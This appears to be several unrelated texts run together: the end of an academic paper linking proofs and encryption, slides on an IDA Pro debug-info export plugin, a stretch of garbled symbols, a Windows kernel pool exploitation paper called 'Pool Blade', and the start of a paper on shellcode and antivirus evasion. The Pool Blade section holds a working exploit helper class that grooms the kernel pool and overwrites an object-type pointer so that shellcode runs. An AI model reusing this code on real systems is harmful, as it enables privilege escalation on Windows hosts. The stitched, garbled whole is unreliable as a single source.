λH.λH 0.λH1.H(λH2.H0(λH3.H1(H2
Kp→qH3
Kp)))
it says that if : His of type ((p→q)→r)→r,H0is of type (p→r)→randH1oftypeq→r
then : the typeof the initial formula is given by the λ-term. Here the types of H3andH2arepandp→q
respectively. In the decryption algorithm, they should be substituted by keys KpandKp→qwhich are not
available to the developer. Here again we observe that Happlies on a λ-term as in Example 4.
The above example seems to be a threat to the proposition Provability implies Decryptability and remains
unresolved.
p,q⊢pEncryption termination step {n}q→(p→p)={Kq,Kp,{n}Kp}q⊢(p→p)
⊢q→(p→p)
Proof 4: Proof tree
15
hal-00715726, version 1 - 9 Jul 2012
Γ2,p⊢pΓ2⊢p→q
Γ2,p⊢q Γ2,p⊢q→r
Γ2,p⊢r
Γ2⊢p→r Γ2⊢(p→r)→r
Γ2
Γ1,(p→q)⊢r
Γ1⊢(p→q)→r Γ1⊢((p→q)→r)→r
Γ1  
((p→r)→r),((p→q)→r)→r,q→r⊢rEncryption termination step(p→r)→r,((p→q)→r)→r⊢(q→r)→r
((p→q)→r)→r⊢((p→r)→r)→((q→r)→r)
⊢(((p→q)→r)→r)→(((p→r)→r)→((q→r)→r))
Proof 3: Proof tree
Aquickobservationoftheencryptionprocessleadsustoremarkthattheencryptionalgorithmisprecisely
moving upwards in the proof-tree and the algorithm terminates when the succedent at the indicated step
becomes an atomic term which is ⊥in Proof 3, rin Proof 2 and qin Proof 1. So, encryption is not exactly
building the proof itself though in some cases, they might precisely be the same; for example this happens
for the property q→(p→p), Proof 4. In the worst case, the size of the encrypted nonce can be linear in
the size of the proof.
5.4 Remarks
We consider the two deduction rules (and the only ones in fact) taken from sequent calculus that act on
implications.
Γ,A⊢B
Γ⊢A→B
This rule says that if one can decrypt {n}A→Busing the key KΓthen one is able to decrypt {n}KBif
one has the keys KAandKΓand vice-versa. This is true because by definition {n}A→B={{n}KB,KA}
and the nonce can be decrypted iff KΓandKAyieldKBand this suffices to decrypt {n}KBas well.
Γ⊢A,C Γ,B⊢C
Γ,A→B⊢C
In the same tune, the above rule says if keys KΓandKA→B={KB}KAcan decrypt{n}KCthenKΓ
must be able to decrypt {n}KAandKΓ,KBmust be able to decrypt {n}KCand vice-versa. To be precise
KΓmust yield KA(neglecting the trivial case where it yields KC). For this we might suppose to have a
functionfthat serve this purpose.
If we have some way to define such a function then the problem would be solved and then encryption
under a formula is equivalent to applying the first rule and terminate at the point where the succedent is an
atomic term. The decryption would be to apply the second rule or the first one to build the complete tree
if possible.
16
hal-00715726, version 1 - 9 Jul 2012
6 Applications
As suggested in the paper [Nec97], PCC technique can be used to implement “safe network packet
filters”. It remains in the experimental stage. Many modern operating systems provide a facility for allowing
application programs to receive packets directly from the network device. Typically, an application is not
interested in receiving every packet from the network, but only a small fraction that exhibit a specific
property (e.g. an application might want only TCP packets destined for a Telnet port . In such cases, it is
highly profitable to allow application program to specify a boolean function on network packets, and then
have this filter run within kernel’s address space. The kernel can then avoid delivering uninteresting packets
to the application, thereby saving the cost of many unnecessary context switches. Our technique can prove
to be an alternative to PCC for such applications ( if our technique could provide a sufficient condition i.e.
provable implies decryptable).
Another possible application could be in the implementation of a program checker. A user upon receiving
a program wants to verify whether the terminal executing the program has properly evaluated the program
on a particular input. Another possible variant could be that : we suppose that an independent software
vendor publishes a program with a signature and a user wants to execute the program on an input (possibly
via an agent) and wants some sort of a proof or a signature derived from the original one that attests to the
fact that it was exactly the same program that was evaluated on the input.
7 Conclusion and Future work
Until now, proofs have been seen as programs, the following table explains this with an example :
Property Proof
Typeφ λ-termπ:φ
φ= (A→(A→B))→Bπ=λx.λf.fx
We observe that from any proof πAofA, we can construct a proof πA→BofA→Band usingπwe can
construct a proof πBof B.
ππAπA→B= (λx.λf.λfx )πAπA→B=πA→BπA=πB
With the help of the technique presented in this report we try to see proofs as cryptography and try to
extend the Curry-Howard isomorphism to cryptography though we are successful in only one direction (i.e.
a decryption algorithm πfor a nonce encrypted under a property φgives a proof of the property).
Property Proof
Typeφ λ-termπ:φ
Encryption key φDecryption algorithm π
Use of cryptography to implement zero-knowledge proof makes the implementation more efficient com-
pared to that of PCC and hence the user is no longer forced to send the proof with the code which might
contain informations that the user should not have access to. In the PCC framework, the VC predicate is
computed twice : once to prove it and the other time to verify it. This might be a waste of time. The
other point to note is that the verification process might be long and difficult; in our case it is just a string
comparison of the nonce sent and the nonce received. In all these contexts, our technique proves to provide
an upper hand to both the user and the developer.
The Proof-Carrying Code is considered to be intrinsically safe: most attempts to tamper with either code
or the proof results in a validation error. In the few cases, when the code and the proof are modified such
that validation still succeeds, the new code is also safe. But, in this case, the modified program might not
be the one that the consumer is waiting for. Our technique rejects the result of any possible tamper either
with the property or with the program and this is made possible by the intrinsic cryptographic system.
17
hal-00715726, version 1 - 9 Jul 2012
A further observation reveals that the encryption of a nonce under a property is building a part of the
proof tree (in the worst case building it completely) and decryption is to finish the rest of the tree. The
future work would be to prove that Provability implies Decryptability which might require a complete shift
from the encryption algorithm. And then we could try to extend the logical framework and search for an
efficient encryption scheme that can be implemented in first-order constructive logic (such that it deals with
the quantifiers) and reduces the size of the encrypted nonce (which is sending a nonce under an atomic
formula with several keys). Another line of work would be to make empirical tests on the application of this
technique while reducing the size of the information passed to the developer.
18
hal-00715726, version 1 - 9 Jul 2012
References
[AFV11] S. Agarwal, D. M. Freeman, and V. Vaikunthanathan. Functional encryption for inner product
predicates from learning with errors. In Asiacrypt , 2011.
[AS92] S. Arora and S. Safra. Probabilistic checking of proofs : A new characterization of NP. In
Proceedings of 33rd IEEE Symposium on Foundations of Computer Science , 1992.
[Bel06] M. Bellare. Introduction to Pairing-Based Cryptography. University of California at San Diego,
2006.
[BRS05] V. Bernat, H. Rueß, and N. Shankar. First order cyberlogic. Computer Science Laboratory, SRI
International, 2005.
[BSW11] D. Boneh, A. Sahai, and B. Waters. Functional encryption: Definitions and chanllenges. In TCC,
2011.
[BW07] D. Boneh and B. Waters. Conjunctive, subset and range querries on encrypted data. In TCC,
2007.
[Dow11] G. Dowek. Proofs and Algorithms : An Introduction to Logic and Computability . Springer-Verlag
London, 2011.
[KSW08] J. Katz, A. Sahai, and B. Waters. Predicate encryption supporting disjunctions, polynomial
equations, and inner products. In Eurocrypt , 2008.
[Mer83] D. Meredith. Seperating minimal, intuitionist and classical logic. Notre Dame Journal of Formal
Logic, 24(4):485–490, October 1983.
[Nec97] G. C. Necula. Proof carrying code. In Popl, 1997.
[O’D] M. J. O’Donnell. The SKI combinator calculus : a universal formal system. http:
//people.cs.uchicago.edu/~odonnell/Teacher/Lectures/Formal_Organization_of_
Knowledge/Examples/combinator_calculus/ .
[Sho06] V. Shoup. Sequence of Games : A tool for Taming Complexity in Security Proofs . New York
University, 2006.
[SW05] A. Sahai and B. Waters. Fuzzy identity-based encryption. In Eurocrypt , 2005.
[Tho99] S. Thompson. Type theory and Functional Programming. University of Kent, 1999.
[Wat08] B. Waters. Functional encryption: beyond public key cryptography. http://userweb.cs.utexas.
edu/~bwaters/presentations/files/functional.ppt , 2008.
19
hal-00715726, version 1 - 9 Jul 2012Exporting IDA 
Debug 
Information 
Overview 
●Who am I? 
●What's the problem? 
●What does this tool do? 
●How does it work? 
●Demo 
about:me 

Why export information from IDA? 
●An embedded device may have no way to connect IDA remotely 
○Manually referencing IDA is tedious 
●Some platforms may have software debuggers that would be useful with 
debug info 
●Some tools allow interesting dynamic analysis techniques not available 
with IDA 
○Ex: Reverse debugging 
Use-case: QNX 
●Provides a version of GDB for their platform on lots of architectures 
○Downside: it doesn't use the standard protocol 
●Lots of connected components of mixed architecture 
●Maybe no IP connections 
With this plugin: export the debug info from IDA and import into gdb on the 
target. 
Debug Info Formats 
●STABS 
○Designed in the 1980s 
○Puts all info in symbol table 
○Not well standardized 
●DWARF 
○Designed along with ELF 
○Used by most modern compilers 
○Binary format 
●Windows CodeView/Program Database 
○Mostly undocumented, windows-only 
●Many Others 
○COFF, OMF, IEEE-695 
dwarfexport 
dwarfexport  is a plugin for IDA Pro that creates DWARF 
debug info using function names/variables 
locations/structures extracted from IDA. 
It lets you create binaries as though you had built with debugging enabled. 
Implementation 
What do we need from 
IDA? ●Decompiled source 
●'step' points 
●Global/local variable locations 
●Type information 
Decompilation 
Intermediate 
Representation 
┌ FunctionDecl  main 
└┬ FunctionCall  printf 
├ ├─ StringLiteral %d
├ └─ NumericLiteral 10

IDA AST 

IDA AST 

Step Points 

Local Variables 
●Stack Variables: 
○Location is expressed as an offset from frame base address 
○Note: There is no (complete) SDK interface for this 
●Register Variables: 
○Translate the IDA register number to dwarf number 
Type Information 
As the binary is traversed, maintain a 
mapping of `tinfo_t` to DWARF 
`die`: 
●Extract each struct member 
name and type, as well as the 
offset from the struct start 
●Handle array/pointer types 

Demo 
Other Uses 
●Add debug info for shared libraries and create a fully debugged 
environment 
●Reverse-debugging 
○Tested using 'rr' on linux 
●Hardware Debugging 
○Software frontends for hardware debuggers must use some debug format 
○Green Hill 'MULTI' IDE can import DWARF info 
Eclipse 
CLion 

VS Code 

Visual Studio(?) 
Limitations 
●DWARF debug info is not useful for windows utilities 
●Limitations in IDA SDK may make some debug info inaccurate (for now) 
●Register number translations must be added on a per-architecture basis 
●Local variable values don't display correctly under GDB 8 (released June 4) 
Questions? 
github.com/alschwalm/dwarfexport 
or
goo.gl/MlTkmV Twitter/Github : @alschwalm 
Email : 
adamschwalm@gmail.com 

￿
￿


￿
￿

￿
￿
￿
￿
￿
￿

￿


￿
￿
￿


￿
 →
￿
 →
￿
 →
￿
￿
￿
￿

￿
￿
￿
￿
￿
￿
￿
￿
￿
￿

￿
￿
￿
￿
 ⇐⇒
￿
 ⇐⇒


￿
￿
￿
→
￿
→
￿
￿→
￿→
￿
￿
⇐⇒

￿
 ￿
￿
 ￿
￿
￿
￿
￿ ￿
￿
 ￿
 ￿
￿
￿
￿
￿
￿ ￿
￿
 ￿
￿
￿


⇐⇒
⇐⇒

￿
￿
￿


￿

￿
￿
￿
￿
￿
￿
￿
￿
￿
￿
￿


￿
￿
￿

￿
→
￿

￿
￿
￿


￿
 ⇒
￿
 ⇒
￿
 ⇒
￿
￿
￿


￿
￿
￿
￿
￿
∃
 ∀


￿
￿

￿
￿
￿

￿
￿
￿
￿
￿

￿
￿
￿

￿
 →
￿
 →
￿
→
￿
￿

￿
￿
￿
￿
 →
￿


￿
￿
 →
￿
￿
 →

￿
￿
 →
￿
￿
 →
￿
￿
 →
￿
￿
 →
￿
￿
 →
￿
￿
 →


￿
￿
→
￿
 →
￿
 →
￿
￿
 →
￿
→

→
￿
→
￿
 →
￿
 →

￿
 →
 →
￿
 →
 →

→
→

￿
→
￿
→

￿
￿
￿
￿
 →
￿
￿
￿
 →
￿
￿
 →

￿

￿
 →
￿
 →
￿
 →

￿
￿
￿


￿
￿
￿
￿


￿

￿
￿
￿
￿
￿
￿
￿

￿
 ￿
￿ ￿
￿
￿
￿
￿ ￿
￿
 ￿
 ￿
￿
￿
￿
￿
￿ ￿
￿
 ￿
￿
￿


0  | P a g e 
 Pool Blade  
Generic window s local  pool exploitation  
 
Abstract  
In recent years many methods have been discussed regarding exploitation of pool overflow 
corruptions. Most of these methods are based on the architecture of Pool manager in 
windows. In this paper I am going to discuss a generic method that is based on kern el objects 
and not the pool manager and because of the nature of this technic it is possible to exploit 
pool overflow vulnerabilities easier and more reliable. So I Introduce Pool Blade helper class 
that let us exploit pool overflow in a very short time by  just calling some interface and 
triggering the vulnerability.  Pool blade and the technic discussed in this paper is just 
supported by windows XP/2003 /vista  but it can be extended to support more recent windows 
operating systems.  
 
 
By Ahmad Moghimi   
http://mallocat.com  
 
 
Sponsored  by ZDRESEARCH Team  
http:// zdresearch.com  
 
 
1  | P a g e 
 Introduction  
Exploiting pool overflow using the architecture of pool manager in windows widely discussed by Tarjei 
Mandt  as kernel pool exploitation on windows 7 . There are various problems with methods that are 
based on the Pool allocator : 
- Most of the time Pool allocator exploitation is based on the write4 condition and we have to 
do extra coding of getting address of kernel objects like HalDispatchTable.  
- The deferred pool kill reliability and we have extra headache of s olving this  problem . 
- Many threads on the operating system do pool allocations and frees so there is a high chance 
to get BSOD before having time to fix pool descriptor.  
- Fixing the pool descriptor also need s extra effort and bigger shellcode.  
Although most of the times  the above problems are solvable but it makes kernel exploitation a 
headache and sometimes unreliable and unreliability in kernel means BSOD and system panic,  So In 
this paper we are going to discuss another method which avoid corrupting any pool structure  and is 
based on DKOM  (Direct kernel object modification ) which discussed By Nikita Tarkanov at NoSuchCon . 
Pool Feng Shui  
Heap Feng Shui is a method to exploit heap related issues more reliable on user land and mostly 
browsers. The same concept can be app lied to Pool allocator that is a kind of heap for kernel land. To 
apply this concept to pool memory we should be able to allocate and free pool blocks by th e help of 
some user mode API.  
By analyzing the interface of some NT SYSCALLs we can see that Kernel  objects can be created using 
NtCreate X SYSCALLs. X can be any kind of kernel objects like Process, Key, Port, File, Event, Semaphore . 
Calling such SYSCALLs lead to the calling of nt! ObCreateObject . ObCreateObject  allocate a block of 
pool memory for storin g the content of kernel objects by calling ObpAllocateObject : 
PAGE:004EA504                 push    eax  
PAGE:004EA505                 push    esi  
PAGE:004EA506                 push    [ebp+arg_C]  
PAGE:004EA509                 mov     [edi+10h], ecx  
PAGE:00 4EA50C                 push    edi  
PAGE:004EA50D                 call    ObpAllocateObject(x,x,x,x,x,x)  
PAGE:004EA512                 mov     ebx, eax  
 
The allocated memory will be available until the life time of the object, so when the process exits or 
The handle of the kernel object get closed by help of the NtClose Syscall the allocated buffer for the 
object will be freed. And it is possible to allocate and free memory by Creating and dest roying objects.  
Between kernel objects one of them is interesting for me because it allocate s a small block of memory. 
Here is the structure of KEVENT object in WINXPSP3:  
typedef struct _KEVENT              // 1 elements, 0x10 bytes (sizeof)  
{ 
/*0x000*/     struct _DISPATCHER_HEADER  Header; // 6 elements, 0x10 bytes (sizeof)  
}KEVENT, *PKEVENT;  
 
 
As every kernel object has an Object header with size of 0x18 bytes so when ObpAllocateObject  
allocates for KEVENT object, it allocates 0x18+0x10 = 0x28 bytes of pool memory. By considering size 
of the pool meta data (8 byte) every call to CreateEvent API will allocate 0x30 byte of memory:  
2  | P a g e 
 CreateEvent -> nt!NtCreateEvent -> nt!ObCreateObject -> ObpAllocateObject -> ExAllocatePoolWithTag  
 
Consider we have a pool overflow vulnerability, by creating and destroying lots of KEVENT object it is 
possible to force the vulnerable buffer to be allocated before a KEVENT object. For thi s purpose, we 
should first try to create lots of KEVENT objects  (or any type of objects)  to defragment pool pages. My 
experiment shows that if I create 0x100000 event, it allocates 0x30*0x100000 =~ 50 mb of pool 
memory that is large enough to fill Non -paged pool blocks and allocat e new pages of memory at 
bottom pages.  
Then it is possible to make some holes with size of the vulnerable buffer. For example if the vulnerable 
buffer size i s 0x7d 8 bytes we ca n make some 0x 7d8 byte holes by  closing handle of (0x7d8/0x30 )+1 = 
0x2a number of  event object s that lead to free ing 0x2a block of KEV ENT object memor y and pool 
alloca tor use the same coalescing  algorithm  of the heap allocator to make a new free block of 0x 7d8 
bytes  when freeing continues block of memories . 
8356b000 size:   30 previous size:    0  (Allocated)  Even (Protected)  
8356b030 size:   10 previous size:   30  (Free)       ...n  
8356b040 size:   30 previous size:   10  (Allocated)  Even (Protected)  
8356b070 size:    8 previous size:   30  (Free)       Even  
*8356b078 size:  7d8 previous size:    8  (Allocated) *Ddk     
8356b850 size:   30 previous size:  7d8  (Allocated)  Even (Pr otected)  
8356b880 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b8b0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b8e0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b910 size:   30 previous s ize:   30  (Allocated)  Even (Protected)  
8356b940 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b970 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b9a0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356b9d0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356ba00 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356ba30 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356ba60 size:   30 previous size:   3 0  (Allocated)  Even (Protected)  
8356ba90 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356bac0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356baf0 size:   30 previous size:   30  (Allocated)  Even (Protected)  
8356bb 20 size:   30 previous size:   30  (Allocated)  Even (Protected ) 
   
Object Header  Function pointer overwrite  
Here is the structure of Object header  on windows before vista:  
typedef struct _OBJECT_HEADER           // 12 elements, 0x20 bytes (sizeof)  
          { 
/*0x000*/     LONG 32       PointerCount;  
              union              // 2 elements, 0x4 bytes (sizeof)  
              { 
/*0x004*/         LONG32       HandleCount;  
/*0x004*/         VOID*        NextToFree;  
              }; 
/*0x008*/     struct _OBJECT_TYPE * Type; 
/*0x00C*/     UINT8        NameInfoOffset;  
/*0x00D*/     UINT8        HandleInfoOffset;  
/*0x00E*/     UINT8        QuotaInfoOffset;  
3  | P a g e 
 /*0x00F*/     UINT8        Flags;  
              union             // 2 elements, 0x4 bytes (sizeof)  
              { 
/*0x010*/         struct _OBJECT_CREATE_INFORMATION * ObjectCreateInfo;  
/*0x010*/         VOID*        QuotaBlockCharged;  
              }; 
/*0x014*/     VOID*        SecurityDescriptor;  
/*0x018*/     struct _QUAD Body;   // 1 elements, 0x8 bytes (sizeof)  
          }OBJECT_HEADER, *POBJECT_HEADER ; 
 
In this structure there is a pointer to some OBJECT_TYPE data structure that spec ify type of object and 
is different for various  kernel objects. When  we force th e vulnerable buffer to be allocate d before a 
Kernel objects we have the ability to calculate the offset of this pointer exactly and overwrite  it 
without corrupting Pool  block  metadata  so we can fake the OBJECT_TYPE structure of the next kernel 
objects. Here is the structure of OBJECT_TYPE:  
typedef struct _OBJECT_TYPE   // 12 elements, 0x190 bytes (sizeof)  
          { 
/*0x000*/     struct _ERESOURCE  Mutex;                  // 13 
elements, 0x38 bytes (sizeof)  
/*0x038*/     struct _LIST_ENTRY  TypeList;  // 2 elements, 0x8 bytes  
/*0x040*/     struct _UNICODE_STRING  Name; // 3 elements, 0x8 bytes  
/*0x048*/     VOID*        DefaultObject;  
/*0x04C*/     ULONG32      Inde x; 
/*0x050*/     ULONG32      TotalNumberOfObjects;  
/*0x054*/     ULONG32      TotalNumberOfHandles;  
/*0x058*/     ULONG32      HighWaterNumberOfObjects;  
/*0x05C*/     ULONG32      HighWaterNumberOfHandles;  
/*0x060*/     struct _OBJECT_TYPE_INITIALIZER  TypeInfo; // 20 
elements, 0x4C bytes (sizeof)  
/*0x0AC*/     ULONG32      Key;  
/*0x0B0*/     struct _ERESOUR CE ObjectLocks[4];  
          }OBJECT_TYPE, *POBJECT_TYPE;  
  
In the OBJECT TYPE INITIALIZER section of this structure there are some valuable pointers:  
      typedef struct _OBJECT_TYPE_INITIALIZER                                                                                                                                        
// 20 elements, 0x70 bytes (sizeof)  
          { 
/*0x000*/     UINT16       Length;  
/*0x002*/     UINT8        UseDefaultObject;  
/*0x003*/     UINT8        CaseInsensitive;  
/*0x004*/     ULONG32      InvalidAttributes;  
/*0x008*/     struct _GENERIC_MAPPING  GenericMapping;                                                                                                                                     
/*0x018*/     ULONG32      ValidAccessMask;  
/*0x01C*/     UINT8        SecurityRequired;  
/*0x01D*/     UINT8        MaintainHandleCount;  
/*0x01E*/     UINT8        MaintainTypeList;  
/*0x01F*/     UINT8        _PADDING0_[0x1];  
/*0x020*/     enum _POOL_TYPE  PoolType;  
/*0x024*/     ULONG32      DefaultPagedPoolCharge;  
/*0x028*/     ULONG32      DefaultNonPagedPoolCharge;  
/*0x02C*/     UINT8        _PADDING1_[0x4];  
/*0x030*/     PVOID Dum pProcedure;  
/*0x038*/     PVOID OpenProcedure;  
/*0x040*/     PVOID CloseProcedure;  
/*0x048*/     PVOID DeleteProcedure;  
4  | P a g e 
 /*0x050*/     PVOID ParseProcedure;  
/*0x058*/     PVOID SecurityProcedure;  
/*0x060*/     PVOID QueryNameProcedure;  
/*0x068*/     PVOID O kayToCloseProcedure;  
          }OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;  
 
 
Because we can control Object_type data structure t o a fake structure in user land  memory , it is 
possi ble to control these procedures. The mentioned security procedure  get called when destroying 
the object and because it  is under control we can set it to address shellcode.  
 
Note: th e technic of overwriting  kernel object to get control over Procedures is only possible on  
windows  XP/2003/VISTA  beca use OBJECT_TYP E is not exist anymore in the OBJECT HEADER , But it is 
still possible to find and overwrite  other critical structures or pointers on  7/8.  
Pool Blade Helper class  
I made some small class that can be used to exploit pool overflows easier:  
PoolBlade::PoolBlade()  
{ 
 fake = NULL;  
 buffer = NULL;  
 pShellcode = NULL;  
 hArr = NULL;  
 dwPoolSize = 0;  
} 
 
PoolBlade::PoolBlade(VOID * shellcode, DWORD size)  
{ 
 PoolBlade();  
 pShellcode = shellcode;  
 dwPoolSize = size;  
} 
 
VOID PoolBlade::Fill()  
{ 
 for(int i = 0 ; i < 0x100000 ; i++)  
  CreateEvent(NULL, FALSE, FALSE, NULL);   
} 
BYTE * PoolBlade::AutoExploitInit(DWORD *size)  
{ 
 if(pShellcode == NULL || dwPoolSize ==  0) 
  return NULL; 
  
 Fill(); 
 
 int i; 
 hArr = new HANDLE[0x10000];  
 for(i = 0 ; i < 0x10000 ; i++)  
  hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL);  
   
 for(i = 0 ; i < 0xf000 ; i+=0x200)  
  for(int j = 0; j < (dwPoolSize / 0x30)+1; j++)  
   CloseHandle(hArr[i+j]);  
 
 *size = dwPoolSize + 0x16;  
5  | P a g e 
  buffer = new BYTE[*size];  
 memset(buffer, 0x41, dwPoolSize);   
  
  
 *(WORD*)(buffer+dwPoolSize) = ((dwPoolSize+8)/8) & 0x1ff;   
 buffer[dwPoolSize+2] = 0x06;  
 buffer[dwPoolSize+3] = 0x0A;  
  *(DWORD*)(b uffer+dwPoolSize+4) = 0xee657645;  
 *(DWORD*)(buffer+dwPoolSize+8) = 0xdeadfa11;  
 *(DWORD*)(buffer+dwPoolSize+0xC) = 0xcafebabe;  
 
 fake = new BYTE[0x190];  
 memset(fake, 0, 0x190);  
 *(DWORD*)(fake+0xA8) = (DWORD)pShellcode;    
 
 *(DWORD*)(buffer+dwPoolSize+0x 10) = (DWORD)fake;  
 *(WORD*)(buffer+dwPoolSize+0x14) = NULL;   
 return buffer; 
} 
 
VOID PoolBlade::ExploitFinish()  
{ 
  
 for(int i = 0 ; i < 0x10000 ; i++)   
  CloseHandle(hArr[i]);  
  
 if (fake != NULL)  
  delete fake; 
 if ( buffer != NULL)  
  delete buffer; 
 if(hArr != NULL)  
  delete hArr; 
} 
 
The class simply has t wo interfaces. We instanc e an object from the class  by specifying  size of buffer 
and a pointer to shellcode function.  Then calling  AutoExploitInit  interface , defragment s the pool and 
make the proper  hole s for the request ed size of buffer . It also returns some proper  buffer that can be 
used in the inputs of the vulnerability . Then after trigger ing the vulnerability by the prepared bu ffer it 
is possible to free the allocated  buffer and trigger the  fake SecurityProcedure  to execute the shellcode 
by calling ExploitFinish  function.  
For demonstration  of the method and us age of  the class an exploit code for some pool overflow 
vuln erability in AhnlabV3 Internet security Product is available  here , The class  can be extended to 
support more recent version of windows and also better control over input data and triggering the 
vulnerab ility.  
 
Pros  
1- So Reliable  
Because we don’t corrupt pool header and metadata.  
2- Fast 
It is possible  to exploit a trivial pool overflow in just some minutes  
 
6  | P a g e 
 Cons  
1- Windows  XP/2003/Vista only  
2- Only applicable to Pool overflows of buffer greater than 0x30 bytes.  
Counter  measurement  
By using a separate  pool for kernel objects or other critical data structures it is possible to reduce the 
chance of over writing critical things.  
 
References : 
http://msdn.moonsols.com  
http://www.nosuchcon.org /talks/D3_02_Nikita_Exploiting_Hardcore_Pool_Corruptions_in_Microsof
t_Windows_Kernel.pdf  
https://media.blackhat.com/bh -dc-11/Mandt/BlackHat_DC_2011_Man dt_kernelpool -Slides.pdf  
 
Final note  
Exploiting kernel is not rocket science  and just needs better understating  of the underlying operating 
system. We as ZDRESEARCH worked throug h exploiting concepts and some part of our understanding s 
are available  as exploitation course that  is available here! .  Everyon e interested can enroll  now.  
 SECURITYPAPER
PreparationDate:11Dec2016
ArtofAntiDetection–3
ShellcodeAlchemy
Preparedby:
EgeBALCI
PenetrationTester
ege.balci<at>invictuseurope.com
INVICTUS
2SecurityPaper
TABLEOFCONTENT
1.Abstract:.....................................................................................................................................................3
2.Terminology..............................................................................................................................................3
3.Introduction..............................................................................................................................................4
4.BasicShellcoding.....................................................................................................................................5
5.SolvingTheAddressingProblem.......................................................................................................5
6.HashAPI...................................................................................................................................................10
7.Encoder/DecoderDesign...................................................................................................................11
8.AntiExploitMitigations......................................................................................................................16
9.BypassingEMET.....................................................................................................................................17
10.References:...........................................................................................................................................18
INVICTUS
3SecurityPaper
1.Abstract:
Thispaperwilldealwithsubjectssuchasbasicshellcodingconcepts,assemblylevel
encoder/decoderdesignandfewmethodsforbypassingantiexploitsolutionssuchas
Microsoft’sEnhancedMitigationExperienceToolkit(EMET).Inordertounderstandthe
contentofthispaperreadersneedstohaveatleastintermediatex86assembly
knowledgeanddecentunderstandingofbasicfileformatssuchasCOFFandPE,also
readingotherarticles(ArtofAntiDetection1–IntroductiontoAV&Detection
TechniquesandArtofAntiDetection2–PEBackdoorManufacturing)willhelpwith
understandingtheinnerworkingsofbasicdetectiontechniquesusedbyAVproducts
andterminologyinthispaper.
2.Terminology
ProcessEnvironmentBlock(PEB):
IncomputingtheProcessEnvironmentBlock(abbreviatedPEB)isadatastructureinthe
WindowsNToperatingsystemfamily.Itisanopaquedatastructurethatisusedbythe
operatingsysteminternally,mostofwhosefieldsarenotintendedforusebyanything
otherthantheoperatingsystem.Microsoftnotes,initsMSDNLibrarydocumentation—
whichdocumentsonlyafewofthefields—thatthestructure"maybealteredinfuture
versionsofWindows".ThePEBcontainsdatastructuresthatapplyacrossawhole
process,includingglobalcontext,startupparameters,datastructuresfortheprogram
imageloader,theprogramimagebaseaddress,andsynchronizationobjectsusedto
providemutualexclusionforprocess-widedatastructures.
AddressSpaceLayoutRandomization:
(ASLR)isacomputersecuritytechniqueinvolvedinprotectionfrombufferoverflow
attacks.Inordertopreventanattackerfromreliablyjumpingto,forexample,a
particularexploitedfunctioninmemory,ASLRrandomlyarrangestheaddressspace
positionsofkeydataareasofaprocess,includingthebaseoftheexecutableandthe
positionsofthestack,heapandlibraries.
ImportAddressTable(IAT):
Addresstableisusedasalookuptablewhentheapplicationiscallingafunctionina
differentmodule.Itcanbeintheformofbothimportbyordinalandimportbyname.
Becauseacompiledprogramcannotknowthememorylocationofthelibrariesit
dependsupon,anindirectjumpisrequiredwheneveranAPIcallismade.Asthedynamic
linkerloadsmodulesandjoinsthemtogether,itwritesactualaddressesintotheIAT
slots,sothattheypointtothememorylocationsofthecorrespondinglibraryfunctions.
INVICTUS
4SecurityPaper
DataExecutionPrevention(DEP):
DataExecutionPrevention(DEP)isasetofhardwareandsoftwaretechnologiesthat
performadditionalchecksonmemorytohelppreventmaliciouscodefromrunningona
system.InMicrosoftWindowsXPServicePack2(SP2)andMicrosoftWindowsXPTablet
PCEdition2005,DEPisenforcedbyhardwareandbysoftware.Theprimarybenefitof
DEPistohelppreventcodeexecutionfromdatapages.Typically,codeisnotexecuted
fromthedefaultheapandthestack.Hardware-enforcedDEPdetectscodethatis
runningfromtheselocationsandraisesanexceptionwhenexecutionoccurs.
Software-enforcedDEPcanhelppreventmaliciouscodefromtakingadvantageof
exception-handlingmechanismsinWindows.
AddressLayoutRandomization(ASLR):
Addressspacelayoutrandomization(ASLR)isacomputersecuritytechniqueinvolvedin
protectionfrombufferoverflowattacks.Inordertopreventanattackerfromreliably
jumpingto,forexample,aparticularexploitedfunctioninmemory,ASLRrandomly
arrangestheaddressspacepositionsofkeydataareasofaprocess,includingthebaseof
theexecutableandthepositionsofthestack,heapandlibraries.
stdcallCallingConvention:
ThestdcallcallingconventionisavariationonthePascalcallingconventioninwhichthe
calleeisresponsibleforcleaningupthestack,buttheparametersarepushedontothe
stackinright-to-leftorder,asinthe_cdeclcallingconvention.RegistersEAX,ECX,and
EDXaredesignatedforusewithinthefunction.ReturnvaluesarestoredintheEAX
register.stdcallisthestandardcallingconventionfortheMicrosoftWin32APIandfor
OpenWatcomC++.
3.Introduction
Shellcodesplaysaveryimportantroleincybersecurityfield,theyarewidelyusedina
lotofmalwareandexploits.So,whatisshellcode?Shellcodeisbasicallyaseriesofbytes
thatwillbeinterpretedasinstructionsonCPU,themainpurposeofwritingshellcodesis
exploitingvulnerabilitiesthatallowsexecutingarbitrarybytesonthesystemsuchas
overflowvulnerabilitiesalso,becauseofshellcodescanrundirectlyinsidememorywast
amountofmalwaretakesadvantageofit,thereasonbehindthenameshellcodeis
usuallyshellcodesreturnsacommandshellwhenexecutedbutintimethemeaninghas
evolved,todayalmostallcompilergeneratedprogramscanbeconvertedtoshellcode,
becauseofwritingshellcodeinvolvesanin-depthunderstandingofassemblylanguage
forthetargetarchitectureandoperatingsystem,thispaperwillassumereaderknows
howtowriteprogramsinassemblyonbothWindowsandLinuxenvironments.Thereare
alotofopensourceshellcodesontheinternetbutforexploitingnewanddifferent
vulnerabilitieseverycybersecurityresearchershouldbeabletowritehis/herown
sophisticatedshellcode,
INVICTUS
5SecurityPaper
alsowritingyourownshellcodeswillhelpalotforunderstandingthekeyconceptsof
operatingsystems,theaimofthispaperisexplainingbasicshellcodingconcepts,
showingeffectivemethodsfordecreasingthedetectionrateonshellcodesand
bypassingsomeantiexploitmitigation.
4.BasicShellcoding
Writingshellcodesfordifferentoperatingsystemsrequiresdifferentapproaches,unlike
